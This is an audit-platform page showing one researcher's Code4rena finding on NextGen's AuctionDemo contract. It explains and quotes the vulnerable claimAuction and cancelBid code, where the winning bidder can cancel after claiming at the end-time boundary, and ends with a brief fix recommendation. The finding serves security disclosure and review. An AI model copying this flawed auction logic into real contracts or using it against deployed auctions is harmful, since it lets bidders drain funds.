Back to 8olidity's contests

NextGen - 8olidity's results

Advanced smart contracts for launching generative art projects on Ethereum.

General Information

Platform: Code4rena

Start Date: 30/10/2023

Pot Size: $49,250 USDC

Total HM: 14

Participants: 243

Period: 14 days

Judge: 0xsomeone

Id: 302

League: ETH

NextGen

Findings Distribution

Researcher Performance

Rank: 215/243

Findings: 1

Award: $0.00

🌟 Selected for report: 0

🚀 Solo Findings: 0

External Links

Code4rena Contest PageGithub Contest RepositoryGithub Findings RepositoryNextGen

Findings Information

🌟 Selected for report: smiling_heretic

Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie

Awards

0 USDC - $0.00

Labels

bug
3 (High Risk)
partial-50
upgraded by judge
duplicate-1323

External Links

Link to GitHub issue

Lines of code

https://github.com/code-423n4/2023-10-nextgen/blob/main/smart-contracts/AuctionDemo.sol#L104-L130

Vulnerability details

Impact

The highest bidder can immediately execute cancelBid after successfully executing claimAuction

Proof of Concept

In the claimAuction function, the current block.timestamp is used to check if the auction has ended. If the highest bidder executes cancelBid immediately after claimAuction, the block.timestamp condition is still true, thus allowing cancellation of the bid.

function claimAuction(uint256 _tokenid) public WinnerOrAdminRequired(_tokenid,this.claimAuction.selector){
      require(block.timestamp >= minter.getAuctionEndTime(_tokenid) && auctionClaim[_tokenid] == false && minter.getAuctionStatus(_tokenid) == true);
      auctionClaim[_tokenid] = true;
      uint256 highestBid = returnHighestBid(_tokenid);
      address ownerOfToken = IERC721(gencore).ownerOf(_tokenid);
      address highestBidder = returnHighestBidder(_tokenid);
      for (uint256 i=0; i< auctionInfoData[_tokenid].length; i ++) {
          if (auctionInfoData[_tokenid][i].bidder == highestBidder && auctionInfoData[_tokenid][i].bid == highestBid && auctionInfoData[_tokenid][i].status == true) {
              IERC721(gencore).safeTransferFrom(ownerOfToken, highestBidder, _tokenid);
              (bool success, ) = payable(owner()).call{value: highestBid}("");
              emit ClaimAuction(owner(), _tokenid, success, highestBid);
          } else if (auctionInfoData[_tokenid][i].status == true) {
              (bool success, ) = payable(auctionInfoData[_tokenid][i].bidder).call{value: auctionInfoData[_tokenid][i].bid}("");
              emit Refund(auctionInfoData[_tokenid][i].bidder, _tokenid, success, highestBid);
          } else {}
      }
  }

  // cancel a single Bid

  function cancelBid(uint256 _tokenid, uint256 index) public {
      require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");
      require(auctionInfoData[_tokenid][index].bidder == msg.sender && auctionInfoData[_tokenid][index].status == true);
      auctionInfoData[_tokenid][index].status = false;
      (bool success, ) = payable(auctionInfoData[_tokenid][index].bidder).call{value: auctionInfoData[_tokenid][index].bid}("");
      emit CancelBid(msg.sender, _tokenid, index, success, auctionInfoData[_tokenid][index].bid);
  }

Tools Used

vscode

It is recommended to consider modifying the code to prevent the highest bidder from canceling the bid after claiming the auction, or to adjust the corresponding logic according to needs.

Assessed type

Other

#0 - c4-pre-sort

2023-11-15T10:37:55Z

141345 marked the issue as duplicate of #962

#1 - c4-judge

2023-12-01T16:08:01Z

alex-ppg marked the issue as not a duplicate

#2 - c4-judge

2023-12-01T16:08:10Z

alex-ppg marked the issue as duplicate of #1788

#3 - c4-judge

2023-12-08T18:23:00Z

alex-ppg marked the issue as partial-50

#4 - c4-judge

2023-12-09T00:20:29Z

alex-ppg changed the severity to 3 (High Risk)

AuditHub

A portfolio for auditors, a security profile for protocols, a hub for web3 security.

Built bymalatrax © 2024

Auditors

Browse

Contests

Browse

Get in touch

ContactTwitter